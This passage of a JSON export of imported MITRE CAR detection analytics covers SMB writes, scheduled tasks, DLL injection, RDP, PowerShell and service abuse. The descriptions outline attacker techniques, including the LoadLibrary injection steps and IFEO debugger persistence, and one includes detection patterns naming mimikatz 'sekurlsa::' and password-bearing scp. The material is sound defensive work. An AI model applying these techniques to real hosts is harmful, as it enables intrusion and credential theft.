[Lateral Movement](https://attack.mitre.org/tactics/TA0008) technique. Unlike SMB Reads, SMB Write requests typically require an additional level of access, resulting in less activity. Focusing on SMB Write activity narrows the field to find techniques that actively change remote hosts, instead of passively reading files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1570", "T1021", "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2013-05-003.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2013-05-003", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2013-05-003.yaml" } }, { "id": "mitre-car-car-2013-05-004", "type": "detection", "name": "Execution with AT", "description": "In order to gain [persistence](https://attack.mitre.org/tactics/TA0003/), [privilege escalation](https://attack.mitre.org/tactics/TA0004/), or [remote execution](https://attack.mitre.org/tactics/TA0002/), an adversary may use the Windows built-in command AT (at.exe) to [schedule a command](https://attack.mitre.org/techniques/T1053/002) to be run at a specified time, date, and even host. This method has been used by adversaries and administrators alike. Its use may lead to detection of compromised hosts and compromised users if it is used to move laterally.\nThe built-in Windows tool schtasks.exe ([CAR-2013-08-001](../CAR-2013-08-001)) offers greater flexibility when creating, modifying, and enumerating tasks. For these reasons, schtasks.exe is more commonly used by administrators, tools/scripts, and power users.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1053" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2013-05-004.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2013-05-004", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2013-05-004.yaml" } }, { "id": "mitre-car-car-2013-05-005", "type": "detection", "name": "SMB Copy and Execution", "description": "An adversary needs to gain access to other hosts to move throughout an environment. In many cases, this is a twofold process. First, a file is remotely written to a host via an SMB share (detected by [CAR-2013-05-003](../CAR-2013-05-003)). Then, a variety of [Execution](https://attack.mitre.org/tactics/TA0002) techniques can be used to remotely establish execution of the file or script. To detect this behavior, look for files that are written to a host over SMB and then later run directly as a process or in the command line arguments. SMB File Writes and Remote Execution may happen normally in an environment, but the combination of the two behaviors is less frequent and more likely to indicate adversarial activity.\n\nThis can possibly extend to more copy protocols in order to widen its reach, or it could be tuned more finely to focus on specific program run locations (e.g. `%SYSTEMROOT%\\system32`) to gain a higher detection rate.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1021", "T1078", "T1570" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2013-05-005.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2013-05-005", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2013-05-005.yaml" } }, { "id": "mitre-car-car-2013-05-009", "type": "detection", "name": "Running executables with same hash and different names", "description": "Executables are generally not renamed, thus a given hash of an executable should only have ever one name. Identifying instances where multiple process names share the same hash may find cases where tools are copied by attackers to different folders or hosts to [avoid detection](https://attack.mitre.org/tactics/TA0005).\n\nAlthough this analytic was initially based on MD5 hashes, it is equally applicable to any hashing convention.\n\n### Output Description\n\nA list of hashes and the different executables associated with each one", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2013-05-009.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2013-05-009", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2013-05-009.yaml" } }, { "id": "mitre-car-car-2013-07-001", "type": "detection", "name": "Suspicious Arguments", "description": "Malicious actors may rename built-in commands or external tools, such as those provided by SysInternals, to better [blend in](https://attack.mitre.org/tactics/TA0005) with the environment. In those cases, the file path name is arbitrary and may blend in well with the background. If the arguments are closely inspected, it may be possible to infer what tools are running and understand what an adversary is doing. When any legitimate software shares the same command lines, it must be whitelisted according to the expected parameters.\n\nAny tool of interest with commonly known command line usage can be detecting by command line analysis. Known substrings of command lines include\n\n- PuTTY\n- port forwarding `-R * -pw`\n- secure copy (scp) `-pw * * *@*`\n- mimikatz `sekurlsa::`\n- RAR `* -hp *`\n- Archive`* a *`\n Additionally, it may be useful to find IP addresses in the command line\n- `\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}`\n Logically this analytic makes use of [CAR-2014-03-005](../CAR-2014-03-005).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1003", "T1021", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2013-07-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2013-07-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2013-07-001.yaml" } }, { "id": "mitre-car-car-2013-07-002", "type": "detection", "name": "RDP Connection Detection", "description": "The [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) (RDP), built in to Microsoft operating systems, allows a user to remotely log in to the desktop of another host. It allows for interactive access of the running windows, and forwards key presses, mouse clicks, etc. Network administrators, power users, and end-users may use RDP for day-to-day operations. From an adversary's perspective, RDP provides a means to [laterally move](https://attack.mitre.org/tactics/TA0008) to a new host. Determining which RDP connections correspond to adversary activity can be a difficult problem in highly dynamic environments, but will be useful in identifying the scope of a compromise.\n\nRemote Desktop can be detected in several ways\n\n- Network connections to port 3389/tcp (assuming use of the default port)\n- Packet capture analysis\n- Windows security logs (Event ID 4624, 4634, 4647, 4778)\n- Detecting network connections from `mstsc.exe`\n- Execution of the process `rdpclip.exe`\n- Runs as the clipboard manager on the RDP target if clipboard sharing is enabled\n\n### Output Description\n\nThe time of the Connection, the source, the destination, and the user name used", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1021" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2013-07-002.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2013-07-002", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2013-07-002.yaml" } }, { "id": "mitre-car-car-2013-07-005", "type": "detection", "name": "Command Line Usage of Archiving Software", "description": "Before [exfiltrating data](https://attack.mitre.org/tactics/TA0010) that an adversary has [collected](https://attack.mitre.org/tactics/TA0009), it is very likely that a [compressed archive](https://attack.mitre.org/techniques/T1560) will be created, so that transfer times are minimized and fewer files are transmitted. There is variety between the tools used to compress data, but the command line usage and context of archiving tools, such as ZIP, RAR, and 7ZIP, should be monitored.\n\nIn addition to looking for RAR or 7z program names, command line usage of 7Zip or RAR can be detected with the flag usage of \"`\\* a \\*`\". This is helpful, as adversaries may change program names.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1560" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2013-07-005.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2013-07-005", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2013-07-005.yaml" } }, { "id": "mitre-car-car-2013-08-001", "type": "detection", "name": "Execution with schtasks", "description": "The Windows built-in tool `schtasks.exe` provides the creation, modification, and running of [scheduled tasks](https://attack.mitre.org/techniques/T1053) on a local or remote computer. It is provided as a more flexible alternative to `at.exe`, described in [CAR-2013-05-004](../CAR-2013-05-004). Although used by adversaries, the tool is also legitimately used by administrators, scripts, and software configurations. The scheduled tasks tool can be used to gain [Persistence](https://attack.mitre.org/tactics/TA0003) and can be used in combination with a [Lateral Movement](https://attack.mitre.org/tactics/TA0008) technique to remotely gain [execution](https://attack.mitre.org/tactics/TA0002). Additionally, the command has parameters to specify the user and password responsible for creating the task, as well as the user and password combination that the task will run as. The `/s` flag specifies the remote system on which the task should be scheduled, usually indicating [Lateral Movement](https://attack.mitre.org/tactics/TA0008).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1053" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2013-08-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2013-08-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2013-08-001.yaml" } }, { "id": "mitre-car-car-2013-09-003", "type": "detection", "name": "SMB Session Setups", "description": "Account usage within SMB can be used to identify compromised credentials, and the hosts accessed with them.\n\nThis analytic monitors SMB activity that deals with user activity rather than file activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1187" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2013-09-003.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2013-09-003", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2013-09-003.yaml" } }, { "id": "mitre-car-car-2013-09-005", "type": "detection", "name": "Service Outlier Executables", "description": "New executables that are started as a service are suspicious. This analytic looks for anomalous service executables.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1543" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2013-09-005.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2013-09-005", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2013-09-005.yaml" } }, { "id": "mitre-car-car-2013-10-001", "type": "detection", "name": "User Login Activity Monitoring", "description": "Monitoring logon and logoff events for hosts on the network is very important for situational awareness. This information can be used as an indicator of unusual activity as well as to corroborate activity seen elsewhere.\n\nCould be applied to a number of different types of monitoring depending on what information is desired. Some use cases include monitoring for all remote connections and building login timelines for users.\nLogon events are Windows Event Code 4624 for Windows Vista and above, 518 for pre-Vista. Logoff events are 4634 for Windows Vista and above, 538 for pre-Vista.\n\n### Output Description\n\nThe time of login events for distinct users on individual systems", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1021", "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2013-10-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2013-10-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2013-10-001.yaml" } }, { "id": "mitre-car-car-2013-10-002", "type": "detection", "name": "DLL Injection via Load Library", "description": "Microsoft Windows allows for processes to remotely create threads within other processes of the same privilege level. This functionality is provided via the Windows API [CreateRemoteThread](https://msdn.microsoft.com/en-us/library/windows/desktop/ms682437.aspx). Both Windows and third-party software use this ability for legitimate purposes. For example, the Windows process [csrss.exe](https://en.wikipedia.org/wiki/Client/Server_Runtime_Subsystem) creates threads in programs to send signals to registered callback routines. Both adversaries and host-based security software use this functionality to [inject DLLs](https://attack.mitre.org/techniques/T1055), but for very different purposes. An adversary is likely to inject into a program to [evade defenses](https://attack.mitre.org/tactics/TA0005) or [bypass User Account Control](https://attack.mitre.org/techniques/T1548/002), but a security program might do this to gain increased monitoring of API calls. One of the most common methods of [DLL Injection](https://attack.mitre.org/techniques/T1055) is through the Windows API [LoadLibrary](https://msdn.microsoft.com/en-us/library/windows/desktop/ms684175.aspx).\n\n- Allocate memory in the target program with [VirtualAllocEx](https://msdn.microsoft.com/en-us/library/windows/desktop/aa366890.aspx)\n- Write the name of the DLL to inject into this program with [WriteProcessMemory](https://msdn.microsoft.com/en-us/library/windows/desktop/ms681674.aspx)\n- Create a new thread and set its entry point to [LoadLibrary](https://msdn.microsoft.com/en-us/library/windows/desktop/ms684175.aspx) using the API [CreateRemoteThread](https://msdn.microsoft.com/en-us/library/windows/desktop/ms682437.aspx).\n\nThis behavior can be detected by looking for thread creations across processes, and resolving the entry point to determine the function name. If the function is `LoadLibraryA` or `LoadLibraryW`, then the intent of the remote thread is clearly to inject a DLL. When this is the case, the source process must be examined so that it can be ignored when it is both expected and a trusted process.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1055", "T1548" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2013-10-002.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2013-10-002", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2013-10-002.yaml" } }, { "id": "mitre-car-car-2014-02-001", "type": "detection", "name": "Service Binary Modifications", "description": "Adversaries may modify the binary file for an existing service to achieve [Persistence](https://attack.mitre.org/tactics/TA0003) while potentially [evading defenses](https://attack.mitre.org/tactics/TA0005). If a newly created or modified runs as a service, it may indicate APT activity. However, services are frequently installed by legitimate software. A well-tuned baseline is essential to differentiating between benign and malicious service modifications.\n\n### Output Description\n\nThe Service Name and approximate time in which changes occurred on each host", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1543", "T1574", "T1569" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2014-02-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2014-02-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2014-02-001.yaml" } }, { "id": "mitre-car-car-2014-03-001", "type": "detection", "name": "SMB Write Request - NamedPipes", "description": "An SMB write can be an indicator of lateral movement, especially when combined with other information such as execution of that written file. Named pipes are a subset of SMB write requests. Named pipes such as msftewds may not be alarming; however others, such as lsarpc, may.\n\nMonitoring SMB write requests still creates some noise, particulary with named pipes. As a result, SMB is now split between writing named pipes and writing other files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1570" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2014-03-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2014-03-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2014-03-001.yaml" } }, { "id": "mitre-car-car-2014-03-005", "type": "detection", "name": "Remotely Launched Executables via Services", "description": "There are several ways to cause code to [execute](https://attack.mitre.org/tactics/TA0002) on a remote host. One of the most common methods is via the Windows [Service Control Manager](https://en.wikipedia.org/wiki/Service_Control_Manager) (SCM), which allows authorized users to remotely create and modify services. Several tools, such as [PsExec](https://attack.mitre.org/software/S0029), use this functionality.\n\nWhen a client remotely communicates with the Service Control Manager, there are two observable behaviors. First, the client connects to the [RPC Endpoint Mapper](../CAR-2014-05-001) over 135/tcp. This handles authentication, and tells the client what port the endpoint\u2014in this case the SCM\u2014is listening on. Then, the client connects directly to the listening port on `services.exe`. If the request is to start an existing service with a known command line, the the SCM process will run the corresponding command.\n\nThis compound behavior can be detected by looking for `services.exe` receiving a network connection and immediately spawning a child process.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1543", "T1569" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2014-03-005.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2014-03-005", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2014-03-005.yaml" } }, { "id": "mitre-car-car-2014-03-006", "type": "detection", "name": "RunDLL32.exe monitoring", "description": "Adversaries may find it necessary to use [Dyanamic-link Libraries](https://msdn.microsoft.com/en-us/library/windows/desktop/ms682589.aspx) (DLLs) to [evade defenses](https://attack.mitre.org/tactics/TA0005). One way these DLLs can be \"executed\" is through the use of the built-in Windows utility [RunDLL32](https://attack.mitre.org/techniques/T1218.011), which allows a user to execute code in a DLL, providing the name and optional arguments to an exported entry point. Windows uses RunDll32 legitimately in its normal operation, but with a proper baseline and understanding of the environment, monitoring its usage could be fruitful.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2014-03-006.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2014-03-006", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2014-03-006.yaml" } }, { "id": "mitre-car-car-2014-04-003", "type": "detection", "name": "Powershell Execution", "description": "[PowerShell](https://attack.mitre.org/techniques/T1059/001/) is a scripting environment included with Windows that is used by both attackers and administrators. Execution of PowerShell scripts in most Windows versions is opaque and not typically secured by antivirus which makes using PowerShell an easy way to circumvent security measures. This analytic detects execution of PowerShell scripts.\n\nPowershell can be used to hide monitored command line execution such as:\n- `net use`\n- `sc start`", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2014-04-003.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2014-04-003", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2014-04-003.yaml" } }, { "id": "mitre-car-car-2014-05-001", "type": "detection", "name": "RPC Activity", "description": "Microsoft Windows uses its implementation of [Distributed Computing Environment/Remote Procedure Call](https://en.wikipedia.org/wiki/DCE/RPC) (DCE/RPC), which it calls [Microsoft RPC](https://en.wikipedia.org/wiki/Microsoft_RPC), to call certain APIs remotely.\n\nA Remote Procedure Call is initiated by communicating to the RPC Endpoint Mapper, which exists as the Windows service RpcEptMapper and listens on the port 135/tcp. The endpoint mapper resolves a requested endpoint/interface and responds to the client with the port that the service is listening on. Since the RPC endpoints are assigned ports when the services start, these ports are dynamically assigned from 49152 to 65535. The connection to the endpoint mapper then terminates and the client program can communicate directly with the requested service.\n\nRPC is a legitimate functionality of Windows that allows remote interaction with a variety of services. For a Windows environment to be properly configured, several programs use RPC to communicate legitimately with servers. The background and benign RPC activity may be enormous, but must be learned, especially peer-to-peer RPC between workstations, which is often indicative of [Lateral Movement](https://attack.mitre.org/tactics/TA0008).\n\nAccording to ATT&CK, adversaries frequently use RPC connections to remotely\n\n- [Create/modify](https://attack.mitre.org/techniques/T1543/003) and [execute](https://attack.mitre.org/techniques/T1569/002) services ([CAR-2014-03-005](CAR-2014-03-005))\n- [Schedule Tasks](https://attack.mitre.org/techniques/T1053) ([CAR-2015-04-002](../CAR-2015-04-002))\n- Query ([CAR-2014-11-007](../CAR-2014-11-007)) and Invoke ([CAR-2014-12-001](../CAR-2014-12-001)) - [Windows Management Instrumentation (WMI)](https://attack.mitre.org/techniques/T1047)\n\nAdditional endpoints are detailed at [here](http://www.hsc.fr/ressources/articles/win_net_srv/well_known_named_pipes.html).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1021" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2014-05-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2014-05-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2014-05-001.yaml" } }, { "id": "mitre-car-car-2014-05-002", "type": "detection", "name": "Services launching Cmd", "description": "Windows runs the [Service Control Manager](https://en.wikipedia.org/wiki/Service_Control_Manager) (SCM) within the process `services.exe`. Windows launches services as independent processes or DLL loads within a [svchost.exe](https://en.wikipedia.org/wiki/svchost.exe) group. To be a legitimate service, a process (or DLL) must have the appropriate service entry point [SvcMain](https://msdn.microsoft.com/en-us/library/windows/desktop/ms687414.aspx). If an application does not have the entry point, then it will timeout (default is 30 seconds) and the process will be killed.\n\nTo survive the timeout, [adversaries and red teams](https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf) can create services that direct to `cmd.exe` with the flag `/c`, followed by the desired command. The `/c` flag causes the command shell to run a command and immediately exit. As a result, the desired program will remain running and it will report an error starting the service. This analytic will catch that command prompt instance that is used to launch the actual malicious executable. Additionally, the children and descendants of services.exe will run as a SYSTEM user by default. Thus, services are a convenient way for an adversary to gain [Persistence](https://attack.mitre.org/tactics/TA0003) and [Privilege Escalation](https://attack.mitre.org/tactics/TA0004).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1543" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2014-05-002.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2014-05-002", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2014-05-002.yaml" } }, { "id": "mitre-car-car-2014-07-001", "type": "detection", "name": "Service Search Path Interception", "description": "According to [ATT&CK](https://attack.mitre.org/), an adversary may [escalate privileges](https://attack.mitre.org/tactics/TA0004) by [intercepting the search path](https://attack.mitre.org/techniques/T1579/009) for legitimately installed services. As a result, Windows will launch the target executable instead of the desired binary and command line. This can be done when there are spaces in the binary path and the path is unquoted. Search path interception should never happen legitimately and will likely be the result of an adversary abusing a system misconfiguration. With a few regular expressions, it is possible to identify the execution of services with intercepted search paths.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1574" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2014-07-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2014-07-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2014-07-001.yaml" } }, { "id": "mitre-car-car-2014-11-002", "type": "detection", "name": "Outlier Parents of Cmd", "description": "Many programs create command prompts as part of their normal operation including malware used by attackers. This analytic attempts to identify suspicious programs spawning `cmd.exe` by looking for programs that do not normally create `cmd.exe`.\n\nWhile this analytic does not take the user into account, doing so could generate further interesting results.\nIt is very common for some programs to spawn cmd.exe as a subprocess, for example to run batch files or windows commands. However many process don\u2019t routinely launch a command prompt \u2013 for example Microsoft Outlook. A command prompt being launched from a process that normally doesn\u2019t launch command prompts could be the result of malicious code being injected into that process, or of an attacker replacing a legitimate program with a malicious one.\n\n\n### Output Description\n\nThe time and host the new process was started as well as its parent", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2014-11-002.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2014-11-002", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2014-11-002.yaml" } }, { "id": "mitre-car-car-2014-11-003", "type": "detection", "name": "Debuggers for Accessibility Applications", "description": "The Windows Registry location `HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options` allows for parameters to be set for applications during execution. One feature used by malicious actors is the \"Debugger\" option. When a key has this value enabled, a Debugging command line can be specified. Windows will launch the Debugging command line, and pass the original command line in as an argument. Adversaries can set a Debugger for [Accessibility Applications](https://attack.mitre.org/techniques/T1546/008). The analytic looks for the original command line as an argument to the Debugger. When the strings \"sethc.exe\", \"utilman.exe\", \"osk.exe\", \"narrator.exe\", and \"Magnify.exe\" are detected in the arguments, but not as the main executable, it is very likely that a Debugger is set.\n\nThis analytic could depend on the possibility of the known strings used as arguments for other applications used in the day-to-day environment. Although the chance of the string \"sethc.exe\" being used as an argument for another application is unlikely, it still is a possibility.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1546" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2014-11-003.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2014-11-003", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2014-11-003.yaml" } }, { "id": "mitre-car-car-2014-11-004", "type": "detection", "name": "Remote PowerShell Sessions", "description": "According to [ATT&CK](https://attack.mitre.org/), [PowerShell](https://attack.mitre.org/techniques/T1059/001) can be used over WinRM to remotely run commands on a host. When a remote PowerShell session starts, svchost.exe executes wsmprovhost.exe\n\nFor this to work, certain registry keys must be set, and the WinRM service must be enabled. The PowerShell command `Enter-PSSession -ComputerName \\` creates a remote PowerShell session.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1059", "T1021" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2014-11-004.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2014-11-004", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2014-11-004.yaml" } }, { "id": "mitre-car-car-2014-11-005", "type": "detection", "name": "Remote Registry", "description": "An adversary can remotely [manipulate the registry](https://attack.mitre.org/techniques/T1112) of another machine if the RemoteRegistry service is enabled and valid credentials are obtained. While the registry is remotely accessed, it can be used to prepare a [Lateral Movement](https://attack.mitre.org/tactics/TA0008) technique, [discover](https://attack.mitre.org/tactics/TA0007) the configuration of a host, achieve [Persistence](https://attack.mitre.org/tactics/TA0003), or anything that aids an adversary in achieving the mission. Like most ATT&CK techniques, this behavior can be used legitimately, and the reliability of an analytic depends on the proper identification of the pre-existing legitimate behaviors. Although this behavior is disabled in many Windows configurations, it is possible to [remotely enable](https://attack.mitre.org/techniques/T1569/002) the RemoteRegistry service, which can be detected with [CAR-2014-03-005](../CAR-2014-03-005).\n\nRemote access to the registry can be achieved via\n\n- Windows API function [RegConnectRegistry](https://msdn.microsoft.com/en-us/library/windows/desktop/ms724840.aspx)\n- command line via `reg.exe`\n- graphically via 